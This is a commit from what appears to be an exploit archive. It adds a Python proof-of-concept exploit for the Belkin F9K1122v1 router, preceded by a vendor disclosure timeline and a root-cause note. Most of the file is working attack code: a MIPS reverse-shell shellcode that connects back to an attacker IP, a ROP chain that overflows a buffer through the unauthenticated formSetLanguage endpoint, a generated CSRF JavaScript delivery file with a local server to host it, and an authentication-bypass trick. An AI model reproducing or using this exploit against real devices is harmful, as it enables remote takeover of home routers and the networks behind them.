DB: 2016-09-05

1 new exploits Too many to list!
2016-09-05 05:09:09 +00:00 · 2016-09-05 05:09:09 +00:00 · 51bcf38036
commit 51bcf38036
parent b2749125b0
2 changed files with 3550 additions and 3283 deletions
--- a/files.csv
+++ b/files.csv
--- a/platforms/hardware/webapps/40332.py
+++ b/platforms/hardware/webapps/40332.py
@ -0,0 +1,266 @@
+import socket, sys , base64, struct, string, urllib
+from getopt import getopt as GetOpt, GetoptError
+from uuid import getnode as get_mac
+import SimpleHTTPServer, SocketServer
+
+
+# TIMELINE #
+'''
+3/16/2016 - First Submission to Belkin [no response]
+5/3/2016 - Second Submission to Belkin [no response]
+6/4/2016 - Notification of 0day [vendor responded]
+           Vendor Response: Our email system was broken but we want another 90 days.
+9/3/2016 - Notification of 0day sent to Belkin. [no response]
+9/4/2016 - The second 90 day extension is over.
+'''
+
+
+# Root cause analysis and all of that fun stuff
+'''
+This is the CSRF PoC. You will need to embed your JS soruce somewhere. '<script src=//ip.addr/a.js>'
+The SSID of the F9K1122v1 does not escape HTML chars so XSS is possible.
+XSS is also possible during provisioning. It does not escape HTML chars while scanning for SSIDs.
+There is no protection against CSRFs so I made this CSRF PoC. 
+
+
+The BoF Vulnerability:
+
+File Name: fmmgmt.c
+-------------------------------------------------------------
+void formSetLanguage(webs_t wp, char_t *path, char_t *query) 
+{
+[CUT]
+...
+	if(apmib_set(MIB_WEB_LANGUAGE, (void *)&type)==0){
+		strcpy(tmpbuf, T("Set WEB language error!"));
+		goto setErr;
+	}
+	apmib_update(CURRENT_SETTING);
+setErr:	
+	urltmp = websGetVar(wp, T("webpage"), T(""));
+	sprintf(tmpbuf, "/%s", urltmp);
+-------------------------------------------------------------
+
+In a nutshell, cause the error and then the webpage parameter will get picked up and then sprintf! yay!
+
+ASLR is broken on this device so ret2libc is possible. Stack + Heap = Executable.
+'''
+
+
+# GREETZ
+'''
+@AustinHackers - I love you all <3
+@Laughing_Mantis - Cause I said I would!
+@MisterCh0c - Keep on h4x0ring IoT products! 
+@IoTVillage - You guys rock!
+@HeadlessZeke - Thanks for influcencing me to challenge myself aka I wanted to show you up :D
+@avicoder - cause you're awesome! :D
+@TheZDI - If it weren't for your comment of wanting me to bypass auth then I wouldn't of found these vulns.
+
+Everyone over at Praetorian - You guys are awesome <3.
+'''
+
+
+def usage():
+	print ""
+	print "CSRF Generator --> Buffer Overflow PoC [Needs to be ran as a SuperUser]"
+	print "By: Elvis Collado [b1ack0wl]"
+	print ""
+	print "Usage: %s -s source.ip -d dst.ip % sys.argv[0]
+	print ""
+	print "\t-s                     Connect back IP [LHOST]"
+	print "\t-d                     Destination IP of Socket Listener [RHOST]"
+	print "\t-h                     Print this Help Menu"
+	print ""
+	sys.exit(1)
+
+
+# Hacky but whatever it gets the point across.
+if len(sys.argv) < 3:
+	usage()
+
+try:
+	(opts, args) = GetOpt(sys.argv[1:], 's:d:h')
+except GetoptError, e:
+	usage()
+for opt, arg in opts:
+	if opt == "-s":
+		connectback_ip = arg.split(".")
+		for a in connectback_ip:
+			if int(a) == 0:
+				print "IP cannot have NULL Bytes :("
+				sys.exit(1)
+		
+		IP_1= struct.pack("<B",int(connectback_ip[0]))
+		IP_2= struct.pack("<B",int(connectback_ip[1]))
+		IP_3= struct.pack("<B",int(connectback_ip[2]))
+		IP_4= struct.pack("<B",int(connectback_ip[3]))
+	elif opt == "-d":
+		host = arg
+	elif opt == "-h":
+		usage()
+
+
+# Shellcode from bowcaster. 
+
+shellcode = string.join([
+	"\x24\x0f\xff\xfa", # li	t7,-6
+	"\x01\xe0\x78\x27", # nor	t7,t7,zero
+	"\x21\xe4\xff\xfd", # addi	a0,t7,-3
+	"\x21\xe5\xff\xfd", # addi	a1,t7,-3
+	"\x28\x06\xff\xff", # slti	a2,zero,-1
+	"\x24\x02\x10\x57", # li	v0,4183
+	"\x01\x01\x01\x0c", # syscall	0x40404
+	"\xaf\xa2\xff\xff", # sw	v0,-1(sp)
+	"\x8f\xa4\xff\xff", # lw	a0,-1(sp)
+	"\x34\x0f\xff\xfd", # li	t7,0xfffd
+	"\x01\xe0\x78\x27", # nor	t7,t7,zero
+	"\xaf\xaf\xff\xe0", # sw	t7,-32(sp)
+
+	# Port 8080
+	"\x3c\x0e\x1f\x90", # lui	t6,0x1f90
+	"\x35\xce\x1f\x90", # ori	t6,t6,0x1f90
+	
+	# Store Port
+	"\xaf\xae\xff\xe4", # sw	t6,-28(sp)
+
+	# Big endian IP address 192.168.206.2
+	"\x3c\x0e"+IP_1+IP_2, # lui	t6,0x7f01
+	"\x35\xce"+IP_3+IP_4, # ori	t6,t6,0x101
+
+	"\xaf\xae\xff\xe6", # sw	t6,-26(sp)
+
+	"\x27\xa5\xff\xe2", # addiu	a1,sp,-30
+	"\x24\x0c\xff\xef", # li	t4,-17
+	"\x01\x80\x30\x27", # nor	a2,t4,zero
+	"\x24\x02\x10\x4a", # li	v0,4170
+	"\x01\x01\x01\x0c", # syscall	0x40404
+	"\x24\x0f\xff\xfd", # li	t7,-3
+	"\x01\xe0\x78\x27", # nor	t7,t7,zero
+	"\x8f\xa4\xff\xff", # lw	a0,-1(sp)
+	"\x01\xe0\x28\x21", # move	a1,t7
+	"\x24\x02\x0f\xdf", # li	v0,4063
+	"\x01\x01\x01\x0c", # syscall	0x40404
+	"\x24\x10\xff\xff", # li	s0,-1
+	"\x21\xef\xff\xff", # addi	t7,t7,-1
+	"\x15\xf0\xff\xfa", # bne	t7,s0,68 <dup2_loop>
+	"\x28\x06\xff\xff", # slti	a2,zero,-1
+	"\x3c\x0f\x2f\x2f", # lui	t7,0x2f2f
+	"\x35\xef\x62\x69", # ori	t7,t7,0x6269
+	"\xaf\xaf\xff\xec", # sw	t7,-20(sp)
+	"\x3c\x0e\x6e\x2f", # lui	t6,0x6e2f
+	"\x35\xce\x73\x68", # ori	t6,t6,0x7368
+	"\xaf\xae\xff\xf0", # sw	t6,-16(sp)
+	"\xaf\xa0\xff\xf4", # sw	zero,-12(sp)
+	"\x27\xa4\xff\xec", # addiu	a0,sp,-20
+	"\xaf\xa4\xff\xf8", # sw	a0,-8(sp)
+	"\xaf\xa0\xff\xfc", # sw	zero,-4(sp)
+	"\x27\xa5\xff\xf8", # addiu	a1,sp,-8
+	"\x24\x02\x0f\xab", # li	v0,4011
+	"\x01\x01\x01\x0c"  # syscall	0x40404
+	], '')
+
+
+
+
+# getRect() son
+huge_string = "IMETHANBRADBERRY " * 6 # I was watching A LOT of Youtube at the time. So I made my padding "IMETHANBRADBERRY" cause it made me lol. :D
+huge_string += "!"   # Filler
+huge_string += struct.pack(">L", 0x2aaf2c80) # s0 Function to LIBC Sleep
+huge_string += "\x43\x43\x43\x43" # s1 but after sleep it's just padding
+huge_string += struct.pack(">L",0x2aafc840)   # RA OverWrite # move t9,s0 jalr t9
+huge_string += "\x44\x44\x44\x44" * 6 # padding
+huge_string += struct.pack(">L",0x31313131) # s0 -  Sleep
+huge_string += struct.pack(">L",0x2aafc840) # s1
+huge_string += struct.pack(">L",0x34343434) # s2
+huge_string += struct.pack(">L",0x2aaf9f38) # Second Rop Chain RA
+huge_string += "\x45\x45\x45\x45" * 9 # Padding
+huge_string += struct.pack(">L",0x2aaf9808) # Third ROP Chain RA
+huge_string += "\x46\x46\x46\x46" * 10
+huge_string += struct.pack(">L",0x2739e8b8) # Hacky NOP Sled YoloSwagSecurity(tm) Style :D
+huge_string += struct.pack(">L",0x2739e8b8) 
+huge_string += struct.pack(">L",0x2739e8b8) 
+huge_string += struct.pack(">L",0x2739e8b8) 
+huge_string += struct.pack(">L",0x2739e8b8) 
+huge_string += struct.pack(">L",0x2739e8b8) 
+huge_string += struct.pack(">L",0x2739e8b8) 
+huge_string += struct.pack(">L",0x2aaf97fc) # Fourth ROP Chain (Stack Exec). $PC will point to the Hacky NOP Sled.
+huge_string += struct.pack(">L",0x2739e8b8) 
+huge_string += struct.pack(">L",0x2739e8b8) 
+huge_string += struct.pack(">L",0x2739e8b8) 
+huge_string += struct.pack(">L",0x2739e8b8) 
+huge_string += struct.pack(">L",0x2739e8b8) 
+huge_string += struct.pack(">L",0x2739e8b8) 
+huge_string += "\x47\x47\x47\x47" # Padding becomes NULL
+huge_string += shellcode # shellcode start
+
+
+'''
+
+NOTES
+
+libc = 0x2aad0000
+
+0x2aafc840 (Sleep)
+
+Gadget 1
+
+0x2aafc840:     move    t9,s0 # Sleep
+0x2aafc844:     jalr    t9 # call sleep. The rest of the instructions will not block out payload and are not included.
+ 
+
+Gadget 2 
+
+0x2aaf9f38:     move    t9,s1 # Addr to Gadget 3
+0x2aaf9f3c:     lw      ra,52(sp)
+0x2aaf9f40:     lw      s3,48(sp)
+0x2aaf9f44:     lw      s2,44(sp)
+0x2aaf9f48:     lw      s1,40(sp)
+0x2aaf9f4c:     lw      s0,36(sp)
+0x2aaf9f50:     jr      t9 # Call Gadget 3
+
+
+
+Gadget 3
+
+0x2aaf9808:     addiu   a0,sp,24 # Add offet +24 to SP and store it in A0
+0x2aaf980c:     lw      ra,52(sp) # load Ret addr
+0x2aaf9810:     jr      ra # ret
+
+
+
+Gadget 4 (Stack Exec)
+
+0x2aaf97fc:     move    t9,a0 # move A0 which contains the address of the stack
+0x2aaf9800:     sw      v0,24(sp)
+0x2aaf9804:     jalr    t9 # Jump to the stack
+0x2aaf9808:     addiu   a0,sp,24 # Before jumping, add +24 to the stack and store it in A0
+
+'''
+
+
+csrf_file = open('a.js', 'wb')
+params = urllib.urlencode({'webpage': huge_string}) # Vulnerable parameter
+destination_addr = 'x.open("POST", "http://' + host + '/goform/formSetLanguage"' + ',true);\n' # Vulnerable Endpoint that does not require authentication
+
+# Write CSRF PoC 
+csrf_file.write('function getrekt(){')
+csrf_file.write('var x = new XMLHttpRequest();\n')
+csrf_file.write(destination_addr)
+csrf_file.write('x.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); \n')
+csrf_file.write('x.send("' + params + '");')
+csrf_file.write('}\ngetrekt();')
+
+# Close file since we're doing writing to it.
+csrf_file.close()
+
+
+# Now Host the CSRF File
+mac = get_mac()
+PORT = 80 # This is why superuser rights are needed
+Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
+httpd = SocketServer.TCPServer(("", PORT), Handler)
+mac_addr = ':'.join(("%012X" % mac)[i:i+2] for i in range(0, 12, 2))
+print "[\033[1;32m+\033[0m] Serving CSRF File on port:", PORT
+print "[\033[1;32m+\033[0m] Copy the following string to bypass HTTPd authentication: \033[1;33m" + "echo \"" + mac_addr.lower() + "\" > /var/remote_mac_addr\033[0m" 
+httpd.serve_forever()